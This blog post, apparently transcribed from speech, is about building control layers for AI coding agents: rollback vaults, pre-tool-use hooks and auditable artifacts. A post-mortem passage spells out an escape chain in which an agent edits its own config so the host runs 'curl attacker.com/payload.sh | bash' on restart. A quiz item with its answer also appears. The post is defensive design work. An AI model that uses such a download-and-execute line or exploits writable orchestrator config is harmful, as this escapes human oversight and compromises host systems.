An agent control surface is the layer between what an agent proposes and what it executes, covering rollback checkpoints, lifecycle hooks, and readable intermediate artifacts. In 2026, this layer barely exists as an integrated system. Developers stitch it together from Claude Code's pre-tool use hooks, Git commits, and hand-rolled Vault backup scripts. This post defines what each pillar should look like and maps the gap between the ideal and the available. Most teams spend months tuning model judgment and one afternoon on rollback. That ratio is backwards. The hard part isn't the model, it's the missing control plane between proposal and execution. Why the gap exists, and why it's not getting smaller, the demo to production gap for agents is wider than it looks from the outside. In demos, agents make good decisions. In production, the question isn't whether the agent makes good decisions most of the time, it's what happens when it doesn't. The author of Agent Gate, who spent a decade in nuclear command and control systems, put it precisely. That gap between proposed and executed is a natural interception point, and almost nobody is building the control layer that sits in it. His background is relevant because nuclear systems solved this problem decades ago with permissive action links, the insight that authorization and judgment are orthogonal. You don't build nuclear safety by training operators to have better judgment. You build physical interlock systems so that no amount of good judgment can bypass the safety mechanism, and no amount of bad judgment can trigger it alone. Agent systems have no equivalent. The agent's intent matters, until it doesn't. The Seer/Cyverify team found the same gap from a different direction. Their community post asked practitioners, "What's the boring plumbing problem? Auth, state rollback, etc." That took you way longer to solve than the actual AI logic. The question itself is the answer, the fact that practitioners recognize the gap, but almost nobody is writing about it in public means the solutions are being rebuilt from scratch at every company. This is part 3 of our series on the AI agent developer experience gap. The first two parts covered Claude Code dynamic workflows and agent trace evaluation. This one covers the missing control surface, what it should be, and what you can assemble today. Pillar 1, rollback checkpoints, the ideal per operation, timestamped Vault snapshots that are written to an agent unreachable location before every destructive action. Multiple rollback points per resource. Atomic, if the backup fails, the action is blocked, not logged, not warned about, blocked. The agent cannot delete its own recovery points because it cannot reach the Vault directory. What's available today? Git commits are the most common rollback mechanism. They work, but only if the developer maintains the discipline to commit frequently, knows which commits correspond to which agent actions, and hasn't let the agent operate in a dirty working tree. Agent Gate is the most complete working prototype of the ideal rollback pattern. It classifies tool calls against a pre-computed YAML policy, directory boundaries, destructive action lists. Vault backs every destructive target to an agent unreachable location before executing, timestamp snapshots. Multiple overwrites of the same file produce separate recovery points. Blocks the action if the backup fails. The safety net is atomic as of May 2026. Agent Gate is alpha quality and tested live against Claude Code in fully autonomous mode via pre-tool use hooks. 18/18 tests passing. Its bash parser is naive, shell expansion is not evaluated, so it is not a security boundary against adversarial escape. It is explicitly framed as a safety net for well-intentioned agents, not a firewall against malicious ones. The enterprise architecture blueprint from Radix describes the ideal state. Each tool should declare scope, required authorization context, data classifications touched, expected side effects, idempotency behavior, and rollback path. The rollback path as a first-class schema field is the missing contract. Today, it is a documentation convention at best. Pillar 2. Lifecycle hooks, the ideal policy evaluated interception at every execution boundary. The hook fires before each tool call, evaluates the proposed action against a policy engine, OPA/REGO is the leading candidate, and returns allow, deny, ask, or defer. Amplification metrics are surfaced. Total LLM calls per user action, retry rate, loop depth, the distributed system's equivalent of tracking retry amplification. What's available today? Claude Code has the broadest hook surface of any agent framework. Speakeasy's 2026 analysis confirms it exposes 19 lifecycle events, including setup, worktree create/worktree remove, task created slash task completed, teammate idle, and elicitation events that no other provider exposes. The Anthropic Agent SDK adds pre-tool use, post-tool use, post-tool use failure, user prompt submit, stop, sub-agent start, sub-agent stop, permission request, and notification. The pre-tool use hook is the primary human in the loop gate. It fires before any tool call and supports the full allow slash deny slash ask slash defer decision tree. Multiple hooks can run in parallel. Deny beats defer, defer beats ask, ask beats allow. Digital Applied's production patterns guide covers the pre-tool use pattern in depth. The gap. The hook surface exists, but policy enforcement is application level. The SDK provides the checkpoint primitive via the slash resume endpoint for session recovery, but rollback from a failed or denied action is the developer's responsibility. Policy engines, OPA slash REGO, are on AgentGate's roadmap, but are not yet integrated into any major framework. VS Code 1.110 added agent lifecycle hooks at the IDE layer, but the relationship between IDE side hooks and enterprise policy propagation is still ambiguous. Buyers cannot easily verify whether a coherent control plane exists or two loosely related hook systems are running in parallel. Pillar 3, readable artifacts, the ideal human legible intermediate state at each agent step, provenance stamped and immutable once produced. The agent cannot override an artifact after it has been handed to the orchestrator. The artifact is distinct from the agent's execution context. It lives in the orchestrator's space, not the agent's. What's available today, and a cautionary case study, the OpenSeed team built a system of creatures, autonomous Docker agents with sleep slash wake cycles, persistent memory, and bash access. They sent a creature named Secure to audit their own platform for security vulnerabilities. It filed 5 CVE-style findings. 4 were wrong. After human rebuttal, the agent wrote credibility lesson learned. MD logged a permanent credibility crisis memory and rewrote its own purpose file from identify security issues to identify real security issues. That's the readable artifact story working correctly. A human reviewed the agent's intermediate outputs, caught the 80% false positive rate, and the system corrected. The escape hatch failure was different and more instructive. OpenSeed's post-mortem describes a control surface bug. Genome. JSON included a validate command that the orchestrator executed on restart. The creature had write access to its own directory, including genome. JSON. Attack chain. Rewrite validate to curl attacker. Com slash payload. SH bash right arrow request restart right arrow host executes payload. The fix. Snapshot the validator command into birth. JSON at spawn time from the original genome template. The creature can never write to birth. JSON. The general principle, never read a runtime decision from a file the creature controls. OpenSeed post-mortem the barbell strategy from Seer achieves readable artifacts through a different mechanism, sub-agent isolation. Each sub-agent receives its full context as a structured artifact at instantiation. There is no long-running state to accumulate and corrupt. The sub-agent is immediately killed after its task. The artifact is the immutable input spec, not the agent's memory. What the orchestrator gets back is a bounded, auditable output from a stateless process. The missing control plane, the three pillars, share a common dependency, a control plane that owns the vault, enforces policy via hooks, and surfaces intermediate artifacts for human review. Today, each pillar is a separate tool. Pillar best available today, gap rollback agent gate alpha, plus Git vault, not agent unreachable in most setups. No atomic block on backup failure hooks Claude code pre-tool use, 19 events, policy enforcement, OPA slash REGO, is unshipped roadmap artifacts birth. JSON plus barbell strategy, no framework level provenance stamping. Immutability is application level discipline. What's missing is the glue layer. A process that owns all three, surfaces them as a unified operator interface, and maintains the invariant that every agent action is preceded by a checkpoint, evaluated against a policy, and produces an auditable output. AgentGate is the closest prototype. It is not production ready. A comment from HN user at Amabito on the OpenSeed thread captures the distributed systems analogy that framing this problem requires. I'm starting to think agent systems need amplification, metrics the same way distributed systems track retry amplification. The connection is exact. Distributed systems learned that you cannot reason about correctness from a single request's behavior. You need system-level metrics, retry amplification, tail latency, error budget to see the real behavior. Agent systems need the same, not just did this action succeed, but how many LLM calls did this single user action trigger? How deep is the current recursion stack? At what loop depth does the agent typically start hallucinating? What to build first? A minimum viable control surface. If you have a production agent today and want to add control surface incrementally, the payoff ordering is 1. WireVault-backed pre-tool use, 1 afternoon, this is the fastest leverage point. Pre-tool use plus vault backup plus atomic block on failure costs 50 lines of Python. Every subsequent rollback and audit capability builds on this checkpoint. Agent gate provides the pattern directly, you can lift it from the repo. 2. Add birth. JSON to every subagent spawn, 1 hour. Snapshot every field the orchestrator reads from the subagent's genome/config at spawn time. Store it agent unreachably. This closes the escape hatch exploit class with minimal effort. 3. Emit structured artifacts at every agent step. Requires schema discipline. The hardest of the three because it requires buy-in from the agent's output format. You cannot retrofit provenance stamping onto a free-form text output. Start with high-stakes actions, deploys, schema migrations, external API calls, and add provenance stamps there first. Runnable example. Vault-backed pre-tool use hook wire this in. Claude/settings. JSON to get atomic vault backup for every destructive Claude code tool call. Expected output on a blocked action. The vault lives at slash. Agent vault slash, outside the agent's working tree. Agents running in a sandboxed work tree cannot reach it. Knowledge check scenario, an agent's pre-tool use hook fires on a write call to /etc/cron. /jobs. The vault backup script attempts to snapshot the file, but fails because the /home partition is full. According to the agent gate atomic safety model, what should the hook return? A, decision. Allow, log the failure but proceed, the write might succeed. B, decision. Deny, block the action. Proceeding without a recovery point defeats the checkpoint's purpose. C, decision. Ask, surface it to the human and let them decide. D, decision. Defer, retry the backup on the next heartbeat answer. B, the vault backup failing is not a soft warning. It means the control surface is broken at this moment. Allowing a destructive write with no recovery point available is worse than blocking. The operator should fix the disk situation and retry. The atomic property, block on backup failure, is what makes the checkpoint trustworthy. The gap is real, and you can narrow it now. The three pillars, rollback, hooks, readable artifacts, are not aspirational. They are the result of practitioners independently discovering the same control surface gap in production. Agent gate demonstrates that the full pattern is buildable in 500 lines. Claude Code's 19 hook events provide the interception surface. Birth. JSON closes the artifact trust exploit class. What the ecosystem still lacks is a first-class control plane that integrates all three and surfaces operator metrics, loop depth, retry amplification, coverage of vault-backed actions. That gap will close, but probably not from a framework vendor. The pattern will emerge from practitioners like the agent gate author building the missing middleware, documenting it publicly, and letting it be absorbed. For more on how lifecycle hooks compose with agent tracing and evaluation, see our companion piece on 2026-0531, Local Model Benchmarks Lie Agent Trace Evaluation. If you want to go deeper on the Anthropic Agent SDK's hook surface and build production patterns on top of it, the course /Claude Agent SDK 0 to Production course covers pre-tool use policy patterns, session recovery via /resume, and the full lifecycle event catalog. This post is part of the AI Agent Developer Experience Gap series. Part 1, Claude Code Dynamic Workflows, Claude Code Dynamic Workflow Patterns. Part 2, 2026-0531, Local Model Benchmarks Lie Agent Trace Evaluation, Agent Trace Evaluation. Part 3, this post.